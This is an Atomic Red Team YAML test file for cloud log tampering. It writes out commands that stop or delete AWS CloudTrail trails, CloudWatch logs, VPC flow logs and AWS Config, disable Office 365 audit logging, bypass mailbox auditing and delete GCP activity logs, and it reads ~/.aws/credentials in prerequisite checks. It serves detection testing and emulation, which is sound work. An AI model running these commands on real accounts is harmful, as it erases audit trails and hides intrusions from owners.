security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
master
atomic-red-team/atomics/T1685.002/T1685.002.yaml
T
philhagen-rc 113f30c97c Attack v19 migration (#3329)
2026-05-01 23:10:14 -04:00

523 lines
23 KiB
YAML
Raw Permalink Blame History

attack_technique: T1685.002
display_name: 'Disable or Modify Tools: Disable or Modify Cloud Log'
atomic_tests:
- name: AWS - CloudTrail Changes
auto_generated_guid: 9c10dc6b-20bd-403a-8e67-50ef7d07ed4e
description: |
Creates a new cloudTrail in AWS, Upon successful creation it will Update,Stop and Delete the cloudTrail
supported_platforms:
- iaas:aws
input_arguments:
cloudtrail_name:
description: Name of the cloudTrail
type: string
default: "redatomictesttrail"
s3_bucket_name:
description: Name of the bucket
type: string
default: "redatomic-test"
region:
description: Name of the region
type: string
default: "us-east-1"
dependencies:
- description: |
Check if ~/.aws/credentials file has a default stanza is configured
prereq_command: |
cat ~/.aws/credentials | grep "default"
get_prereq_command: |
echo Please install the aws-cli and configure your AWS default profile using: aws configure
- description: |
Check if terraform is installed.
prereq_command: |
terraform version
get_prereq_command: |
echo Please install the terraform and configure your aws default profile
- description: |
Check if the dependency resources are already present.
prereq_command: |
if [ -f "$PathToAtomicsFolder/T1685.002/src/T1685.002-1/terraform.tfstate" ]; then exit 0; else exit 1; fi;
get_prereq_command: |
cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-1/"
terraform init
terraform apply -auto-approve
executor:
command: |
aws cloudtrail update-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --is-multi-region-trail --region #{region}
aws cloudtrail stop-logging --name #{cloudtrail_name} --region #{region}
aws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region}
cleanup_command: |
cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-1/"
terraform destroy -auto-approve
name: sh
elevation_required: false
- name: Azure - Eventhub Deletion
auto_generated_guid: 5e09bed0-7d33-453b-9bf3-caea32bff719
description: |
Identifies an Event Hub deletion in Azure.
An Event Hub is an event processing service that ingests and processes large volumes of events and data.
An adversary may delete an Event Hub in an attempt to evade detection.
https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-about.
supported_platforms:
- iaas:azure
input_arguments:
username:
description: Azure username
type: string
default:
password:
description: Azure password
type: string
default:
event_hub_name:
description: Name of the eventhub
type: string
default: "test_eventhub"
resource_group:
description: Name of the resource group
type: string
default:
name_space_name:
description: Name of the NameSpace
type: string
default:
dependency_executor_name: powershell
dependencies:
- description: |
Install-Module -Name Az
prereq_command: |
try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
get_prereq_command: |
Install-Module -Name AzureAD -Force
- description: |
Check if terraform is installed.
prereq_command: |
terraform version
get_prereq_command: |
echo Please install the terraform.
- description: |
Check if the user is logged into Azure.
prereq_command: |
az account show
get_prereq_command: |
echo Configure your Azure account using: az login.
- description: |
Create dependency resources using terraform
prereq_command: |
try {if (Test-Path "$PathToAtomicsFolder/T1685.002/src/T1685.002-2/terraform.tfstate" ){ exit 0 } else {exit 1}} catch {exit 1}
get_prereq_command: |
cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-2/"
terraform init
terraform apply -auto-approve
executor:
command: |
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-AzureAD -Credential $creds
Remove-AzEventHub -ResourceGroupName #{resource_group} -Namespace #{name_space_name} -Name #{event_hub_name}
name: powershell
elevation_required: false
cleanup_command: |
cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-2/"
terraform destroy -auto-approve
- name: Office 365 - Exchange Audit Log Disabled
auto_generated_guid: 1ee572f3-056c-4632-a7fc-7e7c42b1543c
description: |
You can use the Exchange Management Shell to enable or disable mailbox audit logging for a mailbox.
Unified or Admin Audit logs are disabled via the Exchange Powershell cmdline.
https://github.com/Azure/Azure-Sentinel/blob/master/Detections/OfficeActivity/exchange_auditlogdisabled.yaml
supported_platforms:
- office-365
input_arguments:
username:
description: office-365 username
type: string
default:
password:
description: office-365 password
type: string
default:
dependency_executor_name: powershell
dependencies:
- description: |
ExchangeOnlineManagement PowerShell module must be installed
prereq_command: |
$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
get_prereq_command: |
Install-Module -Name ExchangeOnlineManagement
Import-Module ExchangeOnlineManagement
executor:
command: |
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Set-AdminAuditLogConfig -UnifiedAuditLogIngestionEnabled $False
cleanup_command: |
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Set-AdminAuditLogConfig -UnifiedAuditLogIngestionEnabled $True
name: powershell
elevation_required: false
- name: AWS - Disable CloudTrail Logging Through Event Selectors using Stratus
auto_generated_guid: a27418de-bdce-4ebd-b655-38f11142bf0c
description: |
Update event selectors in AWS CloudTrail to disable the logging of certain management events to evade defense. This Atomic test leverages a tool called Stratus-Red-Team built by DataDog (https://github.com/DataDog/stratus-red-team). Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-event-selectors/
supported_platforms:
- linux
- macos
- iaas:aws
input_arguments:
stratus_path:
description: Path of stratus binary
type: path
default: $PathToAtomicsFolder/T1685.002/src
aws_region:
description: AWS region to detonate
type: string
default: us-west-2
dependency_executor_name: sh
dependencies:
- description: |
Stratus binary must be present at the (#{stratus_path}/stratus)
prereq_command: |
if [ -f #{stratus_path}/stratus ]; then exit 0; else exit 1; fi;
get_prereq_command: |
if [ "$(uname)" == "Darwin" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep Darwin_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
elif [ "$(expr substr $(uname) 1 5)" == "Linux" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep linux_x86_64 | cut -d '"' -f 4)
wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
fi
- description: |
Check if ~/.aws/credentials file has a default stanza is configured
prereq_command: |
cat ~/.aws/credentials | grep "default"
get_prereq_command: |
echo Please install the aws-cli and configure your AWS defult profile using: aws configure
executor:
command: |
export AWS_REGION=#{aws_region}
cd #{stratus_path}
echo "starting warmup"
./stratus warmup aws.defense-evasion.cloudtrail-event-selectors
echo "starting detonate"
./stratus detonate aws.defense-evasion.cloudtrail-event-selectors --force
cleanup_command: |
export AWS_REGION=#{aws_region}
echo "Cleanup detonation"
cd #{stratus_path}
./stratus cleanup --all
rm -rf stratus*
name: sh
elevation_required: false
- name: AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus
auto_generated_guid: 22d89a2f-d475-4895-b2d4-68626d49c029
description: |
This Atomic test will use the Stratus Red Team will first setup a CloudTrail logging into an S3 bucket and will then make an API call to update the lifecycle rule on that S3 bucket with an expiration date of 1 day. This will essentially delete all the logs after one day. Adversaries often do this actiivity to evade detection. Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/
supported_platforms:
- linux
- macos
- iaas:aws
input_arguments:
stratus_path:
description: Path of stratus binary
type: path
default: $PathToAtomicsFolder/T1685.002/src
aws_region:
description: AWS region to detonate
type: string
default: us-west-2
dependency_executor_name: sh
dependencies:
- description: |
Stratus binary must be present at the (#{stratus_path}/stratus)
prereq_command: |
if [ -f #{stratus_path}/stratus ]; then exit 0; else exit 1; fi;
get_prereq_command: |
if [ "$(uname)" == "Darwin" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep Darwin_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
elif [ "$(expr substr $(uname) 1 5)" == "Linux" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep linux_x86_64 | cut -d '"' -f 4)
wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
fi
- description: |
Check if ~/.aws/credentials file has a default stanza is configured
prereq_command: |
cat ~/.aws/credentials | grep "default"
get_prereq_command: |
echo Please install the aws-cli and configure your AWS defult profile using: aws configure
executor:
command: |
export AWS_REGION=#{aws_region}
cd #{stratus_path}
echo "starting warmup"
./stratus warmup aws.defense-evasion.cloudtrail-lifecycle-rule
echo "starting detonate"
./stratus detonate aws.defense-evasion.cloudtrail-lifecycle-rule --force
cleanup_command: |
export AWS_REGION=#{aws_region}
echo "Cleanup detonation"
cd #{stratus_path}
./stratus cleanup --all
rm -rf stratus*
name: sh
elevation_required: false
- name: AWS - Remove VPC Flow Logs using Stratus
auto_generated_guid: 93c150f5-ad7b-4ee3-8992-df06dec2ac79
description: |
This Atomic will attempt to remove AWS VPC Flow Logs configuration. Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.vpc-remove-flow-logs/
supported_platforms:
- linux
- macos
- iaas:aws
input_arguments:
stratus_path:
description: Path of stratus binary
type: path
default: $PathToAtomicsFolder/T1685.002/src
aws_region:
description: AWS region to detonate
type: string
default: us-west-2
dependency_executor_name: sh
dependencies:
- description: |
Stratus binary must be present at the (#{stratus_path}/stratus)
prereq_command: |
if [ -f #{stratus_path}/stratus ]; then exit 0; else exit 1; fi;
get_prereq_command: |
if [ "$(uname)" == "Darwin" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep Darwin_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
elif [ "$(expr substr $(uname) 1 5)" == "Linux" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep linux_x86_64 | cut -d '"' -f 4)
wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
fi
- description: |
Check if ~/.aws/credentials file has a default stanza is configured
prereq_command: |
cat ~/.aws/credentials | grep "default"
get_prereq_command: |
echo Please install the aws-cli and configure your AWS defult profile using: aws configure
executor:
command: |
export AWS_REGION=#{aws_region}
cd #{stratus_path}
echo "starting warmup"
./stratus warmup aws.defense-evasion.vpc-remove-flow-logs
echo "starting detonate"
./stratus detonate aws.defense-evasion.vpc-remove-flow-logs --force
cleanup_command: |
export AWS_REGION=#{aws_region}
echo "Cleanup detonation"
cd #{stratus_path}
./stratus cleanup --all
rm -rf stratus*
name: sh
elevation_required: false
- name: AWS - CloudWatch Log Group Deletes
auto_generated_guid: 89422c87-b57b-4a04-a8ca-802bb9d06121
description: |
Creates a new cloudWatch log group in AWS, Upon successful creation it will Delete the group. Attackers can use this technique to evade defenses by
deleting the log stream. Once it is deleted, the logs created by the attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-group-deletion.html#aws-cloudwatch-log-group-deletion
supported_platforms:
- iaas:aws
input_arguments:
cloudwatch_log_group_name:
description: Name of the cloudWatch log group
type: string
default: "log-test"
region:
description: Name of the region
type: string
default: "us-east-1"
dependencies:
- description: |
Check if ~/.aws/credentials file has a default stanza is configured
prereq_command: |
cat ~/.aws/credentials | grep "default"
get_prereq_command: |
echo Please install the aws-cli and configure your AWS defult profile using: aws configure
executor:
command: |
aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
echo "*** Log Group Created ***"
aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
echo "*** Log Group Deleted ***"
cleanup_command:
name: sh
elevation_required: false
- name: AWS CloudWatch Log Stream Deletes
auto_generated_guid: 33ca84bc-4259-4943-bd36-4655dc420932
description: |
Creates a new cloudWatch log stream in AWS, Upon successful creation it will Delete the stream. Attackers can use this technique to evade defenses by
deleting the log stream. Once it is deleted, the logs created by the attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-stream-deletion.html
supported_platforms:
- iaas:aws
input_arguments:
cloudwatch_log_group_name:
description: Name of the cloudWatch log group
type: string
default: "test-logs"
cloudwatch_log_stream_name:
description: Name of the cloudWatch log stream
type: string
default: "20150601"
region:
description: Name of the region
type: string
default: "us-west-2"
dependencies:
- description: |
Check if ~/.aws/credentials file has a default stanza is configured
prereq_command: |
cat ~/.aws/credentials | grep "default"
get_prereq_command: |
echo Please install the aws-cli and configure your AWS defult profile using: aws configure
executor:
command: |
aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
echo "*** Log Group Created ***"
aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} --region #{region}
echo "*** Log Stream Created ***"
aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} --region #{region}
echo "*** Log Stream Deleted ***"
aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
echo "*** Log Group Deleted ***"
cleanup_command:
name: sh
elevation_required: false
- name: Office 365 - Set Audit Bypass For a Mailbox
auto_generated_guid: c9a2f6fe-7197-488c-af6d-10c782121ca6
description: |
Use Exchange Management Shell to Mailbox auditing to bypass. It will prevent any mailbox audit logging entries being generated for the target e-mail box.
https://learn.microsoft.com/en-us/powershell/module/exchange/set-mailboxauditbypassassociation?view=exchange-ps
supported_platforms:
- office-365
input_arguments:
username:
description: office-365 username
type: string
default: o365_user_test
password:
description: office-365 password
type: string
default: o365_password_test
target_email:
description: office-365 target_email
type: string
default: o365_email_test
dependency_executor_name: powershell
dependencies:
- description: |
ExchangeOnlineManagement PowerShell module must be installed
prereq_command: |
$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
get_prereq_command: |
Install-Module -Name ExchangeOnlineManagement
Import-Module ExchangeOnlineManagement
executor:
command: |
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Set-MailboxAuditBypassAssociation -Identity "#{target_email}" -AuditBypassEnabled $true
cleanup_command: |
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Set-MailboxAuditBypassAssociation -Identity "#{target_email}" -AuditBypassEnabled $false
Disconnect-ExchangeOnline -Confirm:$false
name: powershell
elevation_required: false
- name: GCP - Delete Activity Event Log
auto_generated_guid: d56152ec-01d9-42a2-877c-aac1f6ebe8e6
description: |
GCP provides 4 types of Cloud Audit Logs: Admin Activity, Data Access, System Events, and Policy Denied.
An adversary may attempt to delete logs in order to hide their activity. However, Admin Activity, System Events, and Policy Deny events logs cannot be deleted.
This Atomic attempts to delete the Activity Event log. An event is generated under the method name of `google.logging.v2.LoggingServiceV2.DeleteLog` with a Serverity of `ERROR`.
supported_platforms:
- iaas:gcp
input_arguments:
project-id:
description: ID of the GCP Project you to execute the command against.
type: string
default: atomic-project-1
executor:
name: sh
elevation_required: false
command: |
gcloud config set project #{project-id}
gcloud logging logs delete projects/#{project-id}/logs/cloudaudit.googleapis.com%2Factivity --quiet
dependency_executor_name: sh
dependencies:
- description: |
Requires gcloud
prereq_command: |
if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi;
get_prereq_command: |
echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install"
- description: |
Check if user is logged in
prereq_command: |
gcloud config get-value account
get_prereq_command: |
gcloud auth login --no-launch-browser
- name: AWS - Config Logs Disabled
auto_generated_guid: 4608bc1b-e682-466b-a7d7-dbd76760db31
description: |
Disables AWS Config by stopping the configuration recorder, deleting the delivery channel, and deleting the configuration recorder. An attacker with sufficient permissions can use this to stop configuration change recording and avoid detection of subsequent activity.
supported_platforms:
- iaas:aws
input_arguments:
configuration_recorder_name:
description: Name of the configuration recorder
type: string
default: "redatomictestconfigurationrecorder"
delivery_channel_name:
description: Name of the delivery channel
type: string
default: "redatomictestdeliverychannel"
region:
description: Name of the region
type: string
default: "us-west-2"
dependencies:
- description: |
Check if ~/.aws/credentials file has a default stanza is configured
prereq_command: |
cat ~/.aws/credentials | grep "default"
get_prereq_command: |
echo Please install the aws-cli and configure your AWS default profile using: aws configure
- description: |
Check if terraform is installed.
prereq_command: |
terraform version
get_prereq_command: |
echo Please install terraform and configure your AWS default profile
executor:
command: |
aws configservice stop-configuration-recorder --configuration-recorder-name #{configuration_recorder_name} --region #{region}
echo "*** Configuration recorder stopped ***"
aws configservice delete-delivery-channel --delivery-channel-name #{delivery_channel_name} --region #{region}
echo "*** Delivery channel deleted ***"
aws configservice delete-configuration-recorder --configuration-recorder-name #{configuration_recorder_name} --region #{region}
echo "*** Configuration recorder deleted ***"
cleanup_command: aws configservice list-configuration-recorders --region us-west-2
name: sh
elevation_required: false
Reference in New Issue View Git Blame Copy Permalink